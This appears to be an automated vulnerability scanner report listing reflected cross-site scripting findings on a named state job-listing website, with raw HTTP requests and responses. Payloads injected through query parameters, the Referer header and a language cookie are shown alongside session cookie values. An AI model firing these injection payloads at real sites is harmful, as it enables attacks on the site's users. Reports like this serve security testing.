GET /ada/mn_warn_dsp.cfm?def=false9ef0e"style%3d"x%3aexpression(alert(1))"f93f40cde7a HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:26 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
The value of the FormID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ec4e"style%3d"x%3aexpression(alert(1))"d56a86a0e45 was submitted in the FormID parameter. This input was echoed as 8ec4e"style="x:expression(alert(1))"d56a86a0e45 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /ada/services/schools/schsearch.cfm?securitysys=on&FormID=48ec4e"style%3d"x%3aexpression(alert(1))"d56a86a0e45&rand=461636 HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:32:53 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
The value of the rand request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d686"style%3d"x%3aexpression(alert(1))"e87098b543f was submitted in the rand parameter. This input was echoed as 3d686"style="x:expression(alert(1))"e87098b543f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /ada/services/schools/schsearch.cfm?securitysys=on&FormID=4&rand=4616363d686"style%3d"x%3aexpression(alert(1))"e87098b543f HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:34:59 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
The value of the securitysys request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f014"style%3d"x%3aexpression(alert(1))"bc3565a5b08 was submitted in the securitysys parameter. This input was echoed as 3f014"style="x:expression(alert(1))"bc3565a5b08 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /ada/services/schools/schsearch.cfm?securitysys=on3f014"style%3d"x%3aexpression(alert(1))"bc3565a5b08&FormID=4&rand=461636 HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:30:46 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f223f"><a>4f2eeafb0f7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:57 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Expires: {ts '2011-04-29 17:08:57'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1cb2"%3balert(1)//cd290823b76 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as c1cb2";alert(1)//cd290823b76 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=enc1cb2"%3balert(1)//cd290823b76; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:19:28 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//ENC1CB2";ALERT(1)//CD290823B76\"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9daa"><img%20src%3da%20onerror%3dalert(1)>a6ccc200b23 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as d9daa"><img src=a onerror=alert(1)>a6ccc200b23 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=end9daa"><img%20src%3da%20onerror%3dalert(1)>a6ccc200b23; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:19:21 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="end9daa"><img src=a onerror=alert(1)>a6ccc200b23"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17dbd"><img%20src%3da%20onerror%3dalert(1)>abbcf0f134a was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 17dbd"><img src=a onerror=alert(1)>abbcf0f134a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/404/404_qry.cfm HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en17dbd"><img%20src%3da%20onerror%3dalert(1)>abbcf0f134a; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:07:56 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en17dbd"><img src=a onerror=alert(1)>abbcf0f134a"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75aaa"%3balert(1)//0a76fef37a8 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 75aaa";alert(1)//0a76fef37a8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/404/404_qry.cfm HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en75aaa"%3balert(1)//0a76fef37a8; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:07:59 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN75AAA";ALERT(1)//0A76FEF37A8\"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6398b"><img%20src%3da%20onerror%3dalert(1)>ba3c68b365f was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 6398b"><img src=a onerror=alert(1)>ba3c68b365f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
